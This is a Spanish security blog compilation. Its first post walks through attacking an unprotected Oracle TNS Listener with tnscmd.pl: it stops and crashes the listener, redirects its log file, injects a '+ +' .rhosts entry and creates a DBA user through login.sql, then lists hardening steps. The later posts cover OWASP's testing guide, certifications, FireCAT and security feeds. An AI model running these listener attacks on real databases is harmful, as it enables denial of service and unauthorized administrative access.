Trasteando con los Listener

Muchas veces nos liamos protegiendo concienzudamente una aplicación, y nos olvidamos de otros componentes que pueden comprometer de manera global nuestro sistema. Es el viejo dicho de muchos: la seguridad es tan débil como el eslabón más débil.


Un ejemplo es descuidar el Listener de nuestra base de datos Oracle . De este modo, como por ejemplo, alguien que solo conozca el nombre del host (o dirección IP) y el puerto del listener (default 1521) podría tener control del mismo de manera remota, y por lo tanto:

  • Obtener información detallada de la configuración de Listener y la base dedatos.
  • Denial of Service (DoS): activar el nivel de depuración (trace) a"support" y causar una degradación en el servicio.
  • Denial of Service (DoS): incurrir en la estabilidad del servidorsobreescribiendo ficheros del SO (accesibles por el usuario oracle) a través dela modificación de la localicación de los ficheros de logs.
  • Denial of Service (DoS): Parar el listener y/o cambiar la contraseña dellistener.
  • Permitir Login via rlogin
  • Ejecutar SQL como DBA
Como por ejemplo, para el 'trasteo' he elegido un pequeño pero gran script en perl: tnscmd.pl (James W. Abendschan).

Básicamente, comprobamos la información obtenida a través del Listener de la base de datos, si se permite la modificación de parámetros remota y si está protegido por contraseña.
RECOPILACIÓN DE INFORMACIÓN
- Comprueba si el listener está corriendo en la máquina (ping):
unix% tnscmd -h 172.20.80.12 -p 1521

- Extrar información del estado, la versión y los servicios. Comprueba si existe ADMIN_RESTRICTIONS en el listener.ora (si se permite a usuarios remotos modificar parámetros). Comprueba si se ha fijado una contraseña (-SECURITY=ON):
unix% tnscmd status -h
172.20.80.12 -p 1521
unix% tnscmd status -h
172.20.80.12 -p 1521 --indent
unix% tnscmd version -h
172.20.80.12 -p 1521
unix% tnscmd services -h
172.20.80.12 -p 1521 --indent

DoS
- Comprueba si es posible detener el TNS Listener (si no está protegido por password):
unix% lsnrctl stop
172.20.80.12:1521 (necesitaríamos un cliente Oracle)
unix% tnscmd stop -h
172.20.80.12 -p 1521 (TNS-01169 indicaría que existe una contraseña: se ha intentado ejecutar un comando sin pasar una password)

- Comprueba que diversos paquetes TNS malformados pueden corromper el Listener (SEGV trc_file trc_level use_plugandplay trc_directory snmp_visible log_file log_status log_directory):
unix% tnscmd [badcommand] -h
172.20.80.12 (hemos comprobado en laboratorio, que se ha podido tirar el Listener, sin necesidad de validación con contraseña)

MODIFICACIÓN DE VARIABLES
- Modifica la variable LOGFILE para cambiar la ubicación del fichero de logs del Listener
unix% tnscmd -h
172.20.80.12 -p 1521 --rawcmd "(DESCRIPTION=(CONNECT_DATA=(CID=(PROGRAM=)(HOST=)(USER=))(COMMAND=log_file)(ARGUMENTS=4)(SERVICE=LISTENER)(VERSION=1)(VALUE=/tmp/prueba)))"

EJECUCIÓN DE COMANDOS
- Intenta habilitar el acceso por .rhost ejecutando un comando embebido como usuario oracle:
unix% tnscmd -h
172.20.80.12 --rawcmd "(CONNECT_DATA=(( + + "

CREAR UN USUARIO DBA EN LA BD
- Cambia la ubicación del fichero de log del TNS Listener apuntando al fichero login.sql o glogin.sql (ver modificación de variables)
- Chequea mediante un comando status (ver recopilación de información)
- Crea un usuario DBA en la base de datos inyectando la sentencia SQL correspondiente (ver ejecución de comandos):
unix% tnscmd -h
172.20.80.12 -p 1521 --rawcmd "(CONNECT_DATA=((
> create user prueba identified by prueba;
> grant dba to prueba;
> "
- Vuelve a dejar la variable LOGFILE como estaba
- Login as prueba/prueba@database

Y por último, os dejo las RECOMENDACIONES para que no nos hagan pupa :
  • Establecer una contraseña en el Listener
  • Habilitar el logging
  • Activar Admin_restrictions
  • Aplicar los últimos parches
  • Bloquear SQL*NET en los firewalls
  • Asegurar el directorio $TNS_ADMIN
  • Asegurar TNSLSNR y LSNRCTL
  • Desactivar servicios innecesarios
  • Cambiar el puerto TNS por defecto
  • Monitorizar el fichero de log
Extraído de http://unlugarsinfin.blogspot.es

OWASP (Open Web Application Security Project) Guía de pruebas v3

La versión 3 de la Guía de Pruebas OWASP fue lanzada el pasado mes de Diciembre de 2008, a partir del proyecto que fue parte del OWASP Summer of Code y arrancó en Abril para revisar la versión 2 y mejorarla.

Esta guía de pruebas, de 349 páginas, se divide en 9 sub-categorías para un total de 66 controles realizables durante la actividad de Testing de la Aplicación Web.

Como siempre, cada control tiene un nombre OWASP: por ejemplo Inyección SQL es llamada OWASP-DV-005, y es el quinto control de la categoría de Validación de datos.

Un equipo de 21 autores y 4 revisores ha conseguido realizar esta versión 3 después de 6 meses de duro trabajo.

Podeis descargar la guía desde:

OWASP_Testing_Guide_v3.pdf

Download the presentation here
Browse the Testing Guide v3 on the wiki here

Y ahora, a esperar (o participar) la traducción a nuestro querido castellano!


Extraído de http://unlugarsinfin.blogspot.es

Certificaciones de seguridad

- EC-Council Security Certification
+CHFI - Computer Hacking Forensic Investigator
+CEH - Certified Ethical Hacker
+ECSA - EC-Council Certified Security Analyst
+LPT - Licensed Penetration Tester
- (ISC)²
+CISSP - Certified Information Systems Security Professional
+ISSAP - Information Systems Security Architecture Professional
+ISSMP - Information Systems Security Management Professiona
+ISSEP - Information Systems Security Engineering Professional
+CAP - Certification and Accreditation Professional
+SSCP - Systems Security Certified Practitioner
- Computing Technology Industry Association
+CompTIA Security+
+CompTia A+
- ISACA
+CISA - Certified Information Systems Auditor
+CISM - Certified Information Security Manager
+CGEIT - Certified in the Governance of Enterprise IT
- GIAC
+GIAC - Global Information Assurance Certification
+GREM - GIAC Reverse Engineering Malware
+GHTQ - GIAC Cutting Edge Hacking Techniques
+GWAS - GIAC Web Application Security
- CISCO
+CCENT - Cisco Certified Entry Networking Technician
+CCNA - Cisco Certified Network Associate
+CCSP - Cisco Certified Security Professional
+CCIE - Cisco Certified Internetwork Expert
- Microsoft
+MCP - Microsoft Certified Professional
+MCSA - Microsoft Certified System Associate
+MCSE - Microsoft Certified System Engineer
- Next Generation Security
+NSC - NGSEC Security Certification

Extraído de http://unlugarsinfin.blogspot.es

Firecat 1.5 released

El 8 de enero de 2009, ha sido lanzada la nueva versión de Firecat, la 1.5.

FireCAT (Firefox Catalog of Auditing exTension) es un mapa con la colección de las extensiones para Firefox más útiles orientadas a la auditoría de seguridad de las aplicaciones y búsqueda de vulnerabilidades.

Fuente: http://www.security-database.com/toolswatch/FireCAT-1-5-released.html

FireCAT 1.5 will be the last releaseof this 1.x branch. In fact, we are working on a new improved version2.0 (management of plugins, instant download from security-database,ability to add new extension, extension version checker, Firefox 3.Xcompatible extensions..)

Changes for FireCAT 1.5

Categories :
- New sub-category added "Anti Phising / Pharming / Jacking" under "Misc"
- Renamed category "Network utilities" to "Network tools"
- Added new sub-category "Protocols/Application" under "Network tools"
- Added sub-category "Passwords" under "Network tools"

Extensions:
- TraceAssure added in "Misc -> Anti Phishing"
- Added Surf Jacking Cookie Security Inspector in "Misc->Anti phishing /pharming/jacking" : This extension is based on Sandro Gauci’s paper
- Added entry Exploit-Me Suite in category "Security auditing"
- Access-Me added in "Security auditing -> Exploit-Me Suite"
- Added DNS Unpinning in "Network tools -> Protocols/application"
- Added UnhidePassword in "Network tools -> Passwords"
- Added BestSecurityTip in IT Security Related
- Fixed links to SQL Inject-Me and XSS-Me
- Moved Database extensions (ORACLE, SQL, SQLite, MySQL) to "Network->Protocols/Application"


ATTACHED DOCUMENTS


ATTACHED PICTURES

FireCAT 1.5 Poster

RELATED ARTICLES

FireCAT, Firefox, Framework,

Extraído de http://unlugarsinfin.blogspot.es

Feeds o canales e seguridad informática

Aquí os dejo los mejores feeds anglosajones del momento:

Security News Feeds

Hack In The Box[RSS feed]"Keeping Knowledge Free"
SANS Handlers Diary[RSS feed]
F-Secure Weblog[RSS feed]"Weblog of the F-Secure Antivirus Research Team"
TaoSecurity[RSS feed]
joatBlog[RSS feed]"Security and Blogging and Admin"
Dana Epp's Weblog[RSS feed]"Life, the Universe and everything Security"
Schneier on Security[RSS feed]"Weblog covering security and security technology"
Kasperky Lab Weblog[RSS feed]"Analyst's Diary"
Linux Exposed[RSS feed]"The Linux Security and Hacking Resource"
InfoSec Writers[RSS feed]"The Information Security Writers group"
InfoSec Officer[RSS feed]"Followan Information Security Investigator as he recounts his uniqueexperiences working with federal, corporate, and military institutions"
Linux Security[RSS feed]"The Community's Center for Security"
Security Focus[RSS feed]"The Largest Community of Security Professionals Available Anywhere"
IT Observer[RSS feed]"Information Technology Security Magazine"
Castle Cops[RSS feed]
Zone-H News[RSS feed]"The Internet thermometer"
2600[RSS feed]"The Hacker Quarterly"
Net-Security[RSS feed]
Net-Security Vulnerabilities[RSS feed]
Whitedust[RSS feed]"Where hackers and CSO's get their news fix"
Secunia[RSS feed]"Vulnerability and Virus Information"
Computer World Security[RSS feed]"Security news from Computer Worlds security knowledge center"
Government Computer Security[RSS feed]"Federal, state and local government technology"
ZDNet US Security[RSS feed]"Where technology means business"
ZDNet UK Security[RSS feed]"Where technology means business"
CNet Security[RSS feed]"Tech news first"
Network World Fusion Security[RSS feed]
Info World Security[RSS feed]
Silicon Security[RSS feed]"Security Strategy News, Analysis, and Comment"
eWeek Security[RSS feed]"Enterprise Technology News and Reviews"
SecurityTracker Vulnerabilities[RSS feed]
Microsoft Security[RSS feed]
OSVD[RSS feed]Open source vulnerability database created by and for the community
More Over Computer Security News[RSS feed]

Extraído de http://unlugarsinfin.blogspot.es